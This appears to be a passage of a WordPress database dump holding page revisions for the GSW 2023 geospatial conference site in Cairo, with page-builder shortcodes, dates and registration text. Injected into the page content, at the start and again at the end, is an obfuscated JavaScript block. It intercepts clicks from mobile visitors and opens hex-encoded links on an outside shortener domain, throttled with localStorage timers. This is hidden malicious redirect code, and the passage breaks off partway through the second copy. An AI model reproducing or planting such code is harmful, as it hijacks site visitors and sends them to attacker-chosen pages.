_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 18:18:05','2022-11-09 18:18:05','',3066,'https://gsw2023.com/?p=3184',0,'revision','',0),
(3185,1,'2022-11-09 18:24:25','2022-11-09 18:24:25','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\n<h2><strong> EGYPT GSW\'2023</strong></h2>\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\n<h3></h3>\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\n\n[/bsf-info-box][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\" dt_text_icon_title=\"\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 